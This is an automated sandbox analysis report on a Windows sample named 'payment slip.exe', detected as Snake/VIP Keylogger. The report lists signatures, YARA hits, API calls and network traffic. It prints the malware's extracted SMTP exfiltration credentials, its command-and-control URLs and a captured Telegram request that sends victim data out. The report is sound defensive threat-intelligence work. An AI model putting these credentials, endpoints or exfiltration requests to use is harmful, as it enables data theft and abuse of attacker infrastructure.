
Windows Analysis Report
payment slip.exe

Overview

General Information

Sample name: payment slip.exe
Analysis ID: 1485149
MD5: 0cac6a293391fdb0f89189a89dc47150
SHA1: 080ab6bad708ce618e411d2f1aab56cd24b058ba
SHA256: 51b79481d9e411146f4d43f1c3028b71c020ebd3ebb2e0eaeddc03a7ca0c1106
Tags: exe

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • payment slip.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\payment slip.exe" MD5: 0CAC6A293391FDB0F89189A89DC47150)
    • RegSvcs.exe (PID: 1104 cmdline: "C:\Users\user\Desktop\payment slip.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587"}
Source | Rule | Description | Author | Strings
00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d5cf:$a1: get_encryptedPassword
  • 0x2d8ec:$a2: get_encryptedUsername
  • 0x2d3df:$a3: get_timePasswordChanged
  • 0x2d4e8:$a4: get_passwordField
  • 0x2d5e5:$a5: set_encryptedPassword
  • 0x2ec45:$a7: get_logins
  • 0x2eba8:$a10: KeyLoggerEventArgs
  • 0x2e80d:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
2.2.RegSvcs.exe.580000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegSvcs.exe.580000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegSvcs.exe.580000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.RegSvcs.exe.580000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.RegSvcs.exe.580000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d7cf:$a1: get_encryptedPassword
  • 0x2daec:$a2: get_encryptedUsername
  • 0x2d5df:$a3: get_timePasswordChanged
  • 0x2d6e8:$a4: get_passwordField
  • 0x2d7e5:$a5: set_encryptedPassword
  • 0x2ee45:$a7: get_logins
  • 0x2eda8:$a10: KeyLoggerEventArgs
  • 0x2ea0d:$a11: KeyLoggerEventArgsEventHandler

System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 208.91.199.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 1104, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49725
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-31T09:00:33.864966+0200 | 2803274 | 49705 | 80 | TCP | Potentially Bad Traffic
2024-07-31T09:00:33.118074+0200 | 2803305 | 49704 | 443 | TCP | Unknown Traffic
2024-07-31T09:00:40.378056+0200 | 2803305 | 49712 | 443 | TCP | Unknown Traffic
2024-07-31T09:00:44.027841+0200 | 2803305 | 49716 | 443 | TCP | Unknown Traffic
2024-07-31T09:00:37.056967+0200 | 2803305 | 49710 | 443 | TCP | Unknown Traffic
2024-07-31T09:00:45.364061+0200 | 2803305 | 49719 | 443 | TCP | Unknown Traffic
2024-07-31T09:00:32.568020+0200 | 2803274 | 49702 | 80 | TCP | Potentially Bad Traffic
2024-07-31T09:00:31.588618+0200 | 2803274 | 49702 | 80 | TCP | Potentially Bad Traffic

AV Detection

Source: http://anotherarmy.dns.army:8081 | Avira URL Cloud: Label: malware
Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@tradolgt.com", "Password": "445566nniI", "Host": "mail.tradolgt.com", "Port": "587"}
Source: http://varders.kozow.com:8081 | Virustotal: Detection: 14%
Source: http://aborters.duckdns.org:8081 | Virustotal: Detection: 11%
Source: http://anotherarmy.dns.army:8081 | Virustotal: Detection: 14%
Source: payment slip.exe | ReversingLabs: Detection: 23%
Source: payment slip.exe | Virustotal: Detection: 22%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: payment slip.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: payment slip.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: payment slip.exe, 00000000.00000003.1381560458.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, payment slip.exe, 00000000.00000003.1387805550.0000000003D50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0006C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B7F475h | 2_2_00B7F2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B7F475h | 2_2_00B7F4C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B7FC31h | 2_2_00B7F979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F431E0h | 2_2_05F42DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F42C19h | 2_2_05F42968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4F661h | 2_2_05F4F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F40D0Dh | 2_2_05F40B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F41697h | 2_2_05F40B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F431E0h | 2_2_05F42DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4DC51h | 2_2_05F4D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4D7F9h | 2_2_05F4D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F431E0h | 2_2_05F4310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4D3A1h | 2_2_05F4D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4CF49h | 2_2_05F4CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 2_2_05F40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4FAB9h | 2_2_05F4F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4F209h | 2_2_05F4EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4EDB1h | 2_2_05F4EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4E959h | 2_2_05F4E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4E501h | 2_2_05F4E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05F4E0A9h | 2_2_05F4DE00

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.7:49725 -> 208.91.199.115:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.tradolgt.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 31 Jul 2024 07:00:46 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002711000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.tradolgt.com
Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0
Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

